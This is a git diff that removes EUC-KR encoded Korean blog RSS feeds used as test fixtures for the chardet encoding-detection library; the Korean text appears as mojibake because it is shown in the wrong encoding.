    -´÷ְ׳±·£µוְַ '¼¼ְֿ·³ְַ ¸¶³א'(1692³ג)ְַ ֱץְ־ ¿₪¸®ְ÷£½÷
    -ִֶ¸®½÷´ֲ 9¼¼, ¾ֶ÷ס°װְֿ ְ׸®¾ֱֿמ´ֲ11¼¼, ¾ָ ִֶֶ®³²ְ÷ 12¼¼¿´´.
    -ְ׳ ±·£µוְַ '¼÷ ¿ְ½ֱֳמְַ ¸¶³א'¶ף ÷ׂ¸° »ח°ַ(1582³ג)¿¡¼­´ֲ
    -½ֱַ¦·־ 6¼¼÷־ֵֽ 9¼¼±מֱצְַ ¾מ¸°ְְַּ ֱץ¾נֱ¶ֲק ֳ₪ֳֵµַ¾ת´.
    -
    -¥§. ÷¯ָ£ ÷¯ָ£¸¦ ַד¶פַֿ´ֲ ¿רִ¢ְ÷ ְײ¾מµµ, ְּ´ְַ ַרְַ¸¦ ְֳ»ַ״¼­
    -¹ְ¸¸י¼­±מֱצ ÷¯ָ£ְַ ְ׃¹«¸¦ ¹¾ֶµיְֿ ְ°¡ ¾ר¾ת´.
    -
    -¥¨. ´כ´הַׂ ¼צ ¾ר´ֲ ½ֹ¹®(¾ֻ»ח½÷ ִ¸£¸»(ֱַ¶½÷ µ¿÷ֿ÷־)ְַ ְחֶַ°ְּ
    -3¼¼±גµ¿¾ָ ¹÷¹ַ״¿ֲ ַ׳¸ס)
    -
    -1.´ח½ְֵ÷ ¸¶³א°¡ µָ ֱצ ¸מ ³גְּ µַ´ֲ°¡.
    -
    -2.¸¶³א°¡ µָ ְְּ¯´ֲ ¹«¾שְ־°¡.
    -
    -4.´ח½ְֵּ ¼±ֳֵַׁ ³²»צ¸¶ְַ ְּ¸§ְ÷ ¹«¾שְּ¾ת´ֲ°¡.
    -
    -6.¾ַ¸¶¿¡°װ ¾מ¶² °ְֽ» ¼­¾אַ´ֲ°¡.
    -
    -9.¸¶³אֱ‎ָ¸¿¡´ֲ ¾מ¶² ¾ַ¸¶¿ֽ ְ־°£ְּ ֳג¼®ַ´ֲ°¡.
    -
    -10. ֱ‎ָ¸¿¡¼­´ֲ ¹«¾שְ» ¸װ¾ת´ֲ°¡.
    -
    -22.´ח½ְֵַ °ר¹ְ´ֲ ´©±¸ְ־°¡.

    -
    -23. ÷רְ·ח¿¡ ִ¥ַ״ֱר ¿¬°ם´ֲ ¹«¾שְ¸·־ ¸¸µי¾מֱ³´ֲ°¡.
    -
    -ֱ·«..
    -
    -ֱ¼¼¸¦ ¾ָֿז°ת ְַ׀°ת ÷־ֱ₪°ת ֵ½¿ו, ±ג¸¸°ת ְ§¼±°ת ַצַ׀ְ¸·־
    -¹°µי¿´´ר ְּ·¯ַׁ ¸¶³אְחְֶַ÷ ÷¸´ °תַ׀ְְ־ »ץ·־¿מ ¼¼°ט°ְּ ֳגַצ
    -ַֿ¸י¼­ ֱ¡ֲק »ח¶ףֱצ°װ µָ´. '¼¼°ט±¹°¡'·־¼­ְַ ±׳¸®½÷µµ±³ְ
    -ְ¯·´ְַ ¼÷¼׃ ¾ח°טְַ ±ַ·ֱֲצ¹טְ°¡ ְֱּ¦´ֲ ±³ָ¸°¡ ¾ֶ´ֿ¶ף´ֲ ֱ¡.
    -µ¶ף ¼­ ְּ´½ֹ¹®ְּ³× ¸¶³אְחְֶַ» ַ¿ה·־ ֱַֿצ ¾°װ µַ¾ת´´ֲ ֱ¡.
    -¼¼¼׃ְ ±ַ·ֲµµ ´ץ ְּ»ף µ¿ֱ¶ַׂ ַ¿ה°¡ ¾ר¾ת´´ֲ ֱ¡. 17¼¼±ג¿¡
    -ֱ₪½ֵ°ת ¹°ֱתְּ µ־ °³ ְַ µ¶¸³ְְ־ ½ֳַ¼¶ף´ֲ °ְּֽ ְ־½ִµַ¸י¼­
    -»ח¶קµיְ÷ ¸»ְּ³× »‎°¢ְּ »ח¹°¿¹ ¿µַגְ» ¹ִּ¥ ¼צ ְײ´´ֲ »‎°¢ְ»
    -ֲקֳ ¹צ¸®°װ µַ¾ת´´ֲ ֱ¡µמְ¸·־ ְ־ַ״ ¾צֳ»³­ ָס»‎ְ¸¦ ³½ ±₪¶ץְַ
    -¸¶³א»ח³ְֹ÷ ³¡ְּ ³µ´. ±׳·¯³× ְּ°ְֽ÷ ִָ¿¡
    -¸ִֵ«½ֱֳע(McCarthyism)ְַ ֲֵַ·־ ´½ֳ µמְוַֿ°װ µָ´

    -
    -
    -ֲ°ם¹®ַו : ¸נ¸®½ֳ¸¶ ¾²³׳¿ְְת. ֱ¶¼÷¼ק ¿×. ¸¶³א»ח³ֹ. ַצ¹־½ֳ½÷ֵ
    -  
    -
    -           <¿×»ח÷סֶע> 1994³ג °¿ןָ£

    -
    -ֲק÷׀ָק ְ׀¾מ÷¸¸י ¿הֱע ¿ל¸®°¡ ¸¶³א»ח³ְֹּ¶ף°ם ÷־¸£°ם ְײ´ֲ ÷־÷׀ְּ
    -¾מ¶°ַׁ ¿¬ְ¯¸¦ °¡ֱצ°װ µַ¾ת´ֱֲצ ֱ¶±ְ÷ ְַּ״°¡ µָ´. ַצ¸ם°ת ¸םָ®,
    -ֱר¸®ְַ ½ֳ´כ¿¡ °¡·ֱֱר ֱ₪ִ¡ ±ַ·ְֲַ ¾¿ו°ת ±׳ ÷־÷׀¿¡ °¡·ֱֱר ½ֳ´כְַ
    -¾ן¿ןַׁ ָס»‎¾חµי¿¡ ´כַׁ ֱר½ַ°ת ¼ׂ¹®µי, ±׳¸®°ם ±׳°ְֽ» ´½ֳ ¾ַ¿כ
    -ַֿ¿© ´ץ¿ם ֵ« ַ‎ְֳֵ» °¡ֱ® °¡·ֱ´ֲ ֱ¾±³, ±ַ·ֲ, ֱצ½ֳִ‏µי..
    -
    -ְ־ֵֽ³ ¸¶³א »ח³ֹ...
    -
    -ַצְח ¾מ¶°ַׁ ÷־÷׀ְּ ְ§ ֱ¼¼½ֳ´כְַ ±׳°ֽ°ת ÷ס½ֱַׁ ¾ח»ףְ» ÷¸ְּ´ֲ ֱצ
    -÷ס±³ַ״ ÷¸¸י ְַּ״°¡ °¥ ÷־÷׀ְּ´. ±׳¸®°ם ְּ·¯ַׁ ÷־÷׀µµ ¸פֱצ°¢ַֿ°װ
    -ְּ¿כַֿ·ֱ´ֲ ÷¸ְֱּצ ¾´ֲ ¼ױְּ ְײְ» ¼צ ְײ´´ֲ ֱ¡µµ »‎°¢ַ״ ÷¼ ¹®ֱ¦´.]]>
    -web - Web Column -siwoo -Wed, 15 Jun 2005 10:18:21 +0900 -
    -
    -
    \ No newline at end of file diff --git a/chardet/tests/EUC-KR/sparcs.kaist.ac.kr.xml b/chardet/tests/EUC-KR/sparcs.kaist.ac.kr.xml deleted file mode 100644 index 383e0b8..0000000 --- a/chardet/tests/EUC-KR/sparcs.kaist.ac.kr.xml +++ /dev/null @@ -1,136 +0,0 @@ - - - - -Ari's World -http://sparcs.kaist.ac.kr/~ari -Ari's articles -Thu, 29 Dec 2005 07:58:36 +0900 -ko - -2005 - Best & Comment - °װְ׃ - ·ח¹ּ³׳½÷(PSP) - ¿ֳַ״ °¡ְו ¸¹ְ÷ ½ֳ°£ְ» ֵץְַ´ר °װְ׃ְ÷ WOW¿´´. ֱַֿצ¸¸, ·ח¹ּ³׳½÷°¡ ֳײ°ם¿´´. ֳײ°ם¶ף´ֲ ¸» ְּ¿ְַ ¼צ½ִ¾מ°¡ ´ץ ַ¿הַׂ±מ ? - - ¸¸ָ­ - ְ§´כַׁ ִ³ֳק÷ס - ְּ·± ¸¸ָ­¸¦ ְ¥¿¡¼­ °רֲ¥·־ ÷¼ ¼צ ְײ¾ת´´ֲ °ְֽ÷ ¾צֳ»³­...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.707.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.707.html -Thu, 29 Dec 2005 07:58:15 +0900 -article -ari - - - -±·־¹ת °´ֳ¼ְַ ֳ±גָ­¿ֽ ֵ¬¸°¾ק - ±·־¹ת °´ֳ¼ְַ ֳ±גָ­¿ֽ ֵ¬¸°¾ק ¹ז¹‎ְ÷ ֵ©°װ ¼¼°¡ֱצ·־ ³×´©¾מֱר´. mainַװ¼צ ְְּ¿¡ ֳ±גָ­ / ְִָּ¿¡ ֵ¬¸°¾ק mainַװ¼צ ³»¿¡¼­ ֳ±גָ­ ¹׳ ֵ¬¸°¾ק ֳ³ְ½ »ח¿כַׂ ¶§ ֳ±גָ­ - - 1. mainַװ¼צ ָ£ֳג ְְּ¿¡ ֳ±גָ­ - class CGlobal -{ -public: - CGlobal(...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.704.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.704.html -Wed, 21 Dec 2005 23:59:02 +0900 -article -ari - - - -ִִַ»ֵֽ ¼צ¸® - ¸מ ֱײ ְ÷־ְֵֽ־°¡ ִִַ»ֵֽ°¡ °¡²¾¿ ֱִׁצֱצ ¾´ֲ ַצ»ףְּ ¹»‎ַ´. ±׳µ¿¾ָ ÷° ְֿ ¾ֶ´ׂ°ֵ¶ף »‎°¢ַֿ°ם ¸מ¹ר ´½ֳ ֵ°¸י ֱִׁ®¼­ ֲ°ם ½ב¿װ´ֲµ¥, ֱצ³­ ֱײ ¸ס¿הְֿ¿¡´ֲ ¾ֶ¹«¸® ´½ֳ ִׁµµ ´½ֳ ֱִׁצֱצ ¾¾ֶ¼­ ֱ‎ ±ֳ³ְַ ¼צ¸®ֱ¡ְ¸·־ µי°ם °¬´. ¼צ¸®ַֿ½ֳ´ֲ ÷׀ְּ µ ¿­ְ¸¶ְ ...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.706.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.706.html -Wed, 21 Dec 2005 22:51:24 +0900 -article -ari - - - -ַַ¾ֶ³כְַ ½£ 11±ַ - 12¿ש22ְֿ, ַַ¾ֶ³כְַ ½£ 11±ַ ַׁ,ְֿ µ¿½ֳ ¹ַא. - 3ְֿ ³²¾ׂ±¸³×. ±ג»´. - ¢½ ִ«ְּ ¢½ <a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.705.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.705.html -Mon, 19 Dec 2005 15:25:13 +0900 -article -ari - - - -WOW - µ־ ֱ¾·שְַ 60·¹÷§ - WOW´ֲ 60·¹÷§ְּ ¸¸·¦ְּ´. 60·¹÷§ְ» ֲן´ֲµ¥ °ֹ¸®´ֲ ½ֳ°£ְּ ֳַ·¹ְּ ֵ¸ְ׃ְ¸·־ 10~12ְֿ ֱ₪µµ·־, ´¸¥ ¿ֲ¶ףְ־ °װְ׃µי¿¡ ÷סַֿ¸י »ף´חָק ¸¸·¦ ¸¸µי±ג°¡ ½¬¿מ ֶםְּ´. ´צ÷׀¿¡ ַֿ·ח¿¡ 1~3½ֳ°£ֱ₪µµ °װְ׃ְ» ַֿ´ֲ ֱקְוְ־ְ־ ³×µµ ¸¸·¦ ִ³¸¯ֵֽ¸¦ 3°³³× °¡ֱצ°ם ְײ´. - ֱַֿצ¸¸, ¿הֱע...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.703.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.703.html -Sun, 4 Dec 2005 06:57:39 +0900 -article -ari - - - -ֱ‎ֱ - ֱ‎ֱ°ת °·ֳµָ 3°³ְַ ִֶ¶ף¸ֵֵֽ. - 1. casting time - ֱ‎ֱ »ףֲֵ°¡ µַ±ג ְ§ַ״ ַ¿הַׁ ½ֳ°£. ְֱֿ₪ ½ֳ°£ ְּ»ף ְג»‎°¢ֱַֿצ ¾°ם ֱ‎ֱ »ףֲֵ°¡ µַ±ג ְ§ַׁ ³כ·ְֲ» ַ״¾ ַׁ´. ְּ ½ֳ°£ְּ ֲ×ְ» ¼צ·ֿ ֱ‎ֱ »ףֲֵ°¡ µַ±ג ½±´. casting ֱ¿¡ ¹זַ״¸¦ ¹ְ¸¸י ֱ‎ֱ ½ֶַ׀. - 2. durati...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.702.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.702.html -Wed, 30 Nov 2005 05:17:05 +0900 -article -ari - - - -STL vector, map ְֿ÷־ ¸ג¹צ ֱצ¿ל±ג - Vector for(vector<T>::iterator iter = v.begin(); - iter != v.end();) -{ - if(check condition for *iter) - { - // delete - iter = v.erase(iter); - } - else - { - ...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.701.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.701.html -Wed, 30 Nov 2005 03:58:04 +0900 -article -ari - - - -Rest In Peace - ֱ׳ְ½ְּ ֱײ´ֲ ¾ְִֶַ÷ ¸¶ְ½ְַ ֱ״÷ס¸¦ ַׁ´°ם ַ״¼­ ֱ¾מµו´ֲ °ְּֽ ¾ֶ´ׁ°¡ ÷¸´. <a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.700.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.700.html -Sat, 26 Nov 2005 17:37:35 +0900 -article -ari - - - -WOW - ¾¼צְְֳ ַ®¼¼ֶ® - - ¾ע´ֲ °ק ¹׳ ¾ע±ג ְ§ַ״ °£ ָ½¼צ ¸׃¸® - ½÷ִ®·־¸ַ½÷ ±³ְו. (¾א 10ָ¸) ¾מ±ת - ֳ·ֵ¾ ֳַֿ‏ ¿תֵ¸¶ףֵ©. (2ָ¸) ¼ױ¸ס - °ז¸ְֵו °¡½¿ - ֳ·ֵ¾ »ףֳ‏ µו¶ףֵ°»ח½÷ (1ָ¸) ְו°© - ֳ·ֵ¾ ֳַֿ‏ ÷־³׳ (2ָ¸) ַד¸® - °ז¸ְֵו ¹ֱצ - ½÷ֶ®¶ף¼ײ¸§ ³²ְ ¸®÷לµ¥¾מ (¾א 25ָ¸) ½ֵ¹...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.699.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.699.html -Sun, 13 Nov 2005 20:40:19 +0900 -article -ari - - - -ִµו´ֲ ֲ×ְ÷°װ ֱֱ´ - ִµו´ֲ ¹«ֱ¶°ַ ֲ×ְ÷°װ ֱֱ´. ½ַַא ¼׃µµ°¡ °¡ְו ÷¸¥ ִµו´ֲ ¾ֶ¹« °ֽµµ ֱַֿצ ¾´ֲ ִµו´. ִµו°¡ ֲ×ְ÷°װ ÷¸±גµµ ½±´.(ְּ°ַ ¹´כִֶµµ ¸¹°ֱצ¸¸.) - ³»°¡ ¿¹ְ¿¡ ֲ®´ר ִµו³× ´¸¥ »ח¶קµיְּ ֲ§ ִµו¸¦ ÷¸°ם ְײְ¸¸י ±÷´ץ´ץ±ג°¡ ¸¹ְּ ÷¸ְ־´. ַֿ·ֱ´ֲ ְֿ¿¡ ÷סַ״ ¾µµ¥¾ר´ֲ...<a href="http://sparcs.kaist.ac.kr/~ari/each/article.each.698.html"><img src="http://sparcs.kaist.ac.kr/~ari/image/more.gif" border=0 alt="read more!"></a> -http://sparcs.kaist.ac.kr/~ari/each/article.each.698.html -Mon, 31 Oct 2005 12:17:44 +0900 -article -ari - - - - - - - - diff --git a/chardet/tests/EUC-KR/tori02.egloos.com.xml b/chardet/tests/EUC-KR/tori02.egloos.com.xml deleted file mode 100644 index 6b812ea..0000000 --- a/chardet/tests/EUC-KR/tori02.egloos.com.xml +++ /dev/null @@ -1,483 +0,0 @@ - - - - - ¡ֵה¸®¿µְּ³׳¢½ - http://tori02.egloos.com - ֵה¸®°¡ »ל°ם ְײ´ֲ ְּ¾±ג tori02@gmail.com - ko - Tue, 13 Jan 2004 10:48:43 GMT - - ¡ֵה¸®¿µְּ³׳¢½ - http://pds.egloos.com/logo/1/200401/13/56/a0009856.jpg - http://tori02.egloos.com - 80 - 80 - ֵה¸®°¡ »ל°ם ְײ´ֲ ְּ¾±ג tori02@gmail.com - - - <![CDATA[ ָ°¡°¡±גְ ]]> - http://tori02.egloos.com/1083008 - - ±׳·¡µµ °¡² ¿ֳ¸®´ֲ ָע¼ׂ¸®·־ ½ה··ַׁ ±ג¿מ ¸¸µי¾מ ְּ±·ח°¡ ְ¯ֱצ µַ°ם ְײ¾ת´ֲµ¥..
    -ֱצ±ְ÷ ¶ה..ַֿ°ם ְײְ¸´ֿ~
    -ְּ·¯´°¡ ְּ±·ח ³ל¾ֶ ¹צ¸®´ֲ°ַ ¾ֶ´ֱׁצ?^^;;
    -
    -¾ָµי¾מ ¿ְ°ם ְײ´ֲ »חְּ¿¡ ְּ±·ח ¸נ¾חְּ ָס¾ַָֿ°װ ¹²מ¾מ ¹¹°¡ ¹÷ֱצ ְ ¸נ¸£°´רµ¥..
    -ְּ±·ח½÷ ִ³¸¯ֵֽµיµµ ְײ°ם..ְח¹ױ´ֲ°װ ¸¹³׳¿ה^^
    -
    -ַלַל..¿©·¯÷׀ ¾ָ³חַֿ¼¼¿ה!!¿ְ·§¸¸ְװ´ֿ´!
    -¿ה»ץµי¾מ ¸ַ³¯ ¿ְ·§¸¸~ְװ´ֿ´..ְּ·¯´ֿ±מ ±²ְוָק ½ִ»ףַֿ¸י¼­ ְֱּ¦´ֲ ÷°·ח °½ֹµµ ¾ָ°¡ֱצ½ַ°ֵ °°ְ÷¿¹°¨ְּ..-_-;;;;
    -
    -ְו¸¶°¡ ½ְֳµָ ִָ÷־ֵֽ ¸נµ©ְּ µַ¾ת´ ¾ָµַ¾ת´ -_-;; ₪§₪©³ ¾ְֶת¾¾ ¸מ¹ר °םִ¡·¯ ¿װ´ °¬´ ַֿ´ץ¸¸ ֱ¦´כ·־ µַ±ג ½ְֳַֿ´ֿ ÷»°ְְ־ ´ץְ§°¡ ֳ£¾ֶ¿ָ½ֳ·ױ ִ¼¶ף¸בֳ³·³ ´ֳ¾מ³×±ג ½ְֳַׁ ¸צ°ת ַװ²² ¿ײְּ¸® ְְַֿׂ÷ ¸¹¾ֱֶצ´ֱֲצ..
    -µµֵכ~ְּ±·ח¿¡ ½ה··ַׁ ± ַׁ°³ ¿ֳ¸®±גµµ ¾מ·ֶ°װ µַ¾ת´ר°ְּֽ¿´´ר °ְּֽ¿´½ְ´ֿ´.
    -
    -±׳·¯´°¡~
    -³¾÷־ֵֽ´ֲ ָ°¡!
    -
    -¾מµפ·ח °¡³ִ...
    -±׳°ֵ½ֳ.. ¼­¿ןְװ´ֿ´!
    -
    -ְַַּֿ¸י ָ°¡°¡ ¼­¿ןְּ³ִ ַֿ°ֱצ¸¸~
    -¹°·׀ ´כ±¸÷¸´ ½ֳ¿רַׁ ְְּ¯µµ ְײֱצ¿ה ±׳.·¯.³×.., »ח¶קµי ¸¸³×·¯ °¡´ֲ°װ ´ץ ֵ®´ֿ´¿ה ½ְַ÷^^;
    -°¡ֱ·µי°ת °¡±מ¿מ»ח¶קµיְּ ְײ´ֲ °קְּ´ֿ, ¿ְ·§¸¸¿¡, ±׳¸®°ם ¾ף¸¶µ¿¾ָ ¸ר÷¸´ֿ±מ ¾ף±¼µי ÷¸·¯ °¡´ֲ°ְֱּֽׂ.
    -
    -´כ±¸¿¡ ְײ¾מ¼­µµ ¸¹ְּ ¸ר÷¸±ה ֱַצ¸¸, °°ְ÷ ַׁ±¹¶¥¾ֶ·¡ ְײ¾מ¼­ ±׳³×¸¶ ¿©ֲקַֿ¸י ÷¼ ¼צµµ ְײ´ֲ ָ¯°זְּ¿´ֱצ¸¸ ְֱּ¦ ¾ף¸¶ ¾ְָײְ¸¸י ¶ַ ַׁµ¿¾ְָ÷ ±׳¸¶ְתµµ ¸רַֿ°װ »‎°ו°ֵµח¿ה.
    -
    -³²ֶםְּ ¿ְ·¡ְ ÷־ֵֽ °ר÷־¸¦ ´ץ ַֿ°ם ½ֽ¾מַ´ֲµ¥, ְּ¹ר¿¡ ±׳ ±גָ¸°¡ »‎°וֱצ ¹¼´ֿ±מ?
    -9¿שֳ¿£ ¿µ±¹¿¡ °¡´ֲ ÷סַא±ג¸¦ ֵ¸¾ µֹ °ְֽ־µ¥..±׳·¯ְ´ֿ ¿ײְִֹּ ¸¾ְ÷ ֱ¶±ַֿ°ם ַׂ ְְֿ÷ ¸¹ְ÷ֱצ..
    -±׳·¯¸י¼­ ½ְַ÷ ַֿ´ֲ°ֽµµ ¾ר´ֲµ¥ -_-;;
    -
    -¿¹ְ¿£ °רַ׳¿¡¼­ ְװ±¹ַׂ¶§ ÷סְ¸¦ ֱב´ֲµ¥, ְֱּ¨ ±׳°ֽµµ »חְ¿¡ ¹¾ֶ¾ ַׁ´³×¿ה?
    -°װ´°¡ ÷סְ½ֳֵ»÷ס´ֲ ¿ײְִֹּ ÷ס½ׁ°ֱַצ.. =_=+
    -¾ֶ¹«ֶ°, ְּ¹ר ָ°¡¿£ ÷סְµµ ¹¾ֶ¾ °±ג¿¡ ¼­¿ן·־ ַא¼±ֱצ°¡ ֱ₪ַ״ֱ³½ְ´ֿ´.
    -
    -±׳µ¿¾ָµµ ְּ±·ח°¡ ֲ ½ה··ֱַצ¸¸, ¾ױְ¸·־ ¾ף¸¶°£µµ °ט¼׃ ½ה··ַׂ ְּ±·ח°¡ µֹ °ּ´ֿ´.
    -¿µ±¹¿¡ µµֲרַ״¼­µµ ְ־ֵֽ³ µַ·ֱ¸י ¼¼¿ש¾ֶ ³׳¿ש¾ֶ... °ֹ¸°ִָ¿¡ µֹ°ְּֽ´ֿ±מ ¸»ְֱּׂ.
    -¹¹..µµֲרַ´..ֱ₪µµְַ °£´ַׁ ֶק½÷ְֳֶ÷ µµ¼­° °°ְ÷µ¥¼­µµ ¿ֳ¸± ¼צ ְײ°ֱצ¸¸ ^^;;
    -
    -¿µ±¹ֱ‎¿¡¼­ ְ־ֵֽ³ְּ µַ´ֲ³¯~~ ½ה··ַׁ ¿ֲµµְַ ְּ±·ח¸¦ ´½ֳ µַµ¹·ֱ ³ץְ»°װ¿ה!
    -
    -¹¹..¾ֱֶק °¡·ֱ¸י ַׁ´ְּ³× ³²¾ֱׂצ¸¸, 1ֱײְֿ ¼­¿ן¿¡ ְײ´°¡ ¿ְ¸יְ÷ ֱµµ ֱ₪¸®ַ״¾ ַֿ°ם ±׳·¸°ֱצ¿ה.
    -±׳·³ ´½ֳ ¼ׂ½ִ¿ֳ¸±°װ¿ה!! ´ץְ§¿¡ °ַ°­ ֱ¶½ַֹֿ¼¼¿ה!
    - ]]> - - ְּ±·ח ֱײְ־ְו ֵה¸® - Sun, 31 Jul 2005 06:07:12 GMT - - - <![CDATA[ ³× ¿ײ±׳·¨ְ»±מ? ]]> - http://tori02.egloos.com/1050659 - - ¾ֶ...ֱ₪¸» ´‏´. ְו¸¶ ½ְֳµַ¾מ ִֵָ׃ֱצ± ַֿ±גµµ ַֿ´.
    -ְת¹רֱײ¿¡ ´³א¿ֲ ¼­¿ןְ÷ ±׳³×¸¶ ½ֳ¿רַֿ´ץ¸¸..´כ±¸¿× µµֲרְַֿ¸¶ְ ¶°ַ¹¶קְּ ִָ²צ ¿ֳ¶ף¿ֽ ´כַ ֲעֵכ¿¡ µי¾מ°£ ¸¸µ־µָ ±ג÷׀ְ» ´ְ²¼´°ם³× ַׂ±מ?
    -
    -¾ֶ¹«ֶ°..ְּ ´ץ¿מ ¿©¸§, ¼ױ¿¡ ¶¡ְ»ֱד°װ ַֿ´ֲ »ח°ְַּ ְײ¾תְ¸´ֿ..
    -¹¹..¼ױ¿¡ ¸®¸נִ ֱד¾מµµ ¶¡ְ÷ ³×°ֱצ¸¸, ¿ל¸®ֱ‎¿£ ֱז ¸®¸נְִּ ַׁ°³µµ ¾ר´. ^^;;
    -ֶ¼÷ךְּµµ ¾ר°ם, ¿ְµנ¿ְµµ ¾רְ¸¸ח ¿¡¾מִµµ ¾רְ¸´ֿ±מ..
    -
    -¾ף¸¶ְ ³·¿¡ ֱ‎¿¡ ְײ´ֲµ¥ ְָ­°¡ ¶ל¸®¸µ ¿ֲ´.
    -±³ָ¸ ¾ֶ½ֳ´ֲ ÷׀²²¼­ ¹ז± ±טִ¡¸¦ ´ד±׳¼ּ´ֲµ¥ ֱ» ֱײ½ֳ°´³×...?
    -±׳÷׀ְ÷ ´כ±¸÷׀ ְּ½ֱֳצ¸¸ ¼­¿ן¿¡¼­ ¿ְ·¡ »ח¼ּ°ם, ¼­¿ן½ְִ¸·־ ±טִ¡¸¦ ´ד´ֲ´°ם ³»°¡ »‎°¢³×¼­ ֱ» ֱײ½ֳ°´´.
    -¼­¿ן½ִ ±טִ¡´ֲ ¸¼ְ÷ֱ£°¥·־ ¸ְְ»³»°ם ¾חִֶ¿ֽ ¹טµמְ» ³ײ¾מ ½ֳ¿רַׁ ¸ְְּ ¸¹ְּ ³­´.
    -
    -¾ֶ¹«ֶ°..±טִ¡¾ ¸¹ְ»¼צ·ֿ ְֱֱ¸´ֿ °ְֵ‎ ַׂ ¼צ ¾ר..¾ֶ´ֿ °ְֵ‎ ַֿ±ג ½ָ¾ת°ם^^;;-¿ה»ץ ±טִ¡ֲע¿¡ ¸ְµי·ָ´ -₪·-;; - ¸מ÷׀ ִָ¿¡ ֱ‎¾ױµµ·־¿¡¼­ ¸¸³×±ג·־ ַ´.
    -
    -±טִ¡¸¦ ֱײ½ֳ°´´ֲµ¥..³­ ¶ַ ÷ף¼ױְ¸·־ °¥ ¼צ ְײ³×?? ֱ‎¿¡ ְײ´ֲ°ַ ¾ר°ם..
    -¾ְֶּ ¼ֲ ¾צ¸¶ְ־ ±׳÷׀¿¡°ױ ¿×½ֳ ¾ְֶּµיְ» ְ§ַׁ ¹«¾נ°¡¸¦ µו¸®´ֲ°װ ³´°´ ½ֽ¾ת´.
    -¸¸³×±ג·־ַׁ µµ·־¾ױ¿¡´ֲ ₪§₪»µµ³ֳק °¡°װ°¡ ְײ¾ת°ם ³­ µµ³ֳק¸¦ »ח±ג·־ ¸¾¸װ¾ת´ ^^V
    -°¡±מ¿מ °ק¿¡¼­ ¿ְ½ַ°ְּֽ¹ַ·־ µµ³ֳק¸¦ ¿©ְ¯ְײ°װ °ם¸¦ ½ֳ°£ְּ ¾רְ»°ֵ °°¾ֶ,´«¿¡ ¶ח´ֲ(ֱײ·־ ³»°¡ ³»ֳכַגְַ^^) ֵ« µµ³ֳק 5°³¸¦ ְן¹¿¡ ¿ֳ·ֱ °¡ֱ®°¬´.
    -
    -ֱ¡¿ר: µµ³ֳק ´¼¸°³ ַֿ½ַ·ֱ±¸¿ה?
    -
    -ֵה¸®: ³׳~(±ַׁµם µ·°ת ₪¾₪½ֶקְ־ֶ®ִ«µו µ¿½ֳ¿¡ ³»¹׀¸י¼­)
    -
    -ֱ¡¿ר: ַׁ°³ ´ץ ַֿ½ֳ¸י ¼¼ֶ®·־ ְת·ֵַׁµ¥¿ה?
    -
    -ֵה¸®: ±׳·¡¿ה?( ±ֱַֿצ¸¸ ָ׳°¡¼­ ַׁ°³ ¾ף·· ´ץ ֱ‎¾מ¿װ´)
    -
    -ֱ¡¿ר: ½־ °¡½ֳ·ֱ±¸¿ה?
    -
    -ֵה¸®: ³׳ ½־ֱײ¼¼¿ה.(±ַׁµ¥ ֱרֲ¥ ¸» ¸¹ְּ ½ֳֵ°³׳..»‎°¢ֱ)
    -
    -ֱ¡¿ר: ִ¿ַַ³× ´¸¥ ְ½·ב´ֲ¿ה?
    -
    -ֵה¸®: ¾ֶ µµ³ֳק¸¸ ֱײ¼¼¿ה~^^;;
    -
    -ֱ¡¿ר: ֱצ±ְּ ְּ÷¥ֶ® ±ג°£ְּ¶ף....

    -
    -°ט»ך±ג ´©¸¦ ֱ״÷סְ־ °ֱֻצ¼ױ°¡¶פ ֶל ְ¼¼µµ ¾ֳַָׁ₪·־ ¶ף´ֿ..³­ ְ־³»½ְַֹ ַׁ°ט¸¦ ´ְ³¢°ם´ֲ ±׳¸¸..
    -
    -

    -
    -
    -ַה...! ֱצ± ³»°¡ ¹«½¼ֱ‏ְ» ַׁ°ֱֵצ??
    -
    -ֱצ± ³»°¡ ֱײ¸װְ» ֱד°ם 1ֳ°£ 3¹רµµ ³ׁ°װ ְ§¾ֶ·¡¸¦ ¿װ´°¬´ַֿ¸ח ½½ֲ½ °ט»ך´כ¸¦ ³»¸®ֲן´ֲ ¹«½ֳ¹«½ֳַׁ ַאµ¿ְ» ַׁ°ֵ¾? ±׳·±°ֵ¾?
    -
    -ְב±ס~ ֱרֲ¥·־?
    -ְּ·± ְ¯ִ¡ַֿ°ם ¸ם¶¸¸ָ­¿¡³× ³×¿ְ´ֲ ֳֽ½ֿ°ֵ¸®´ֲ ַאµ¿ְ» ½ֱַ¦·־ ַ´°ם?
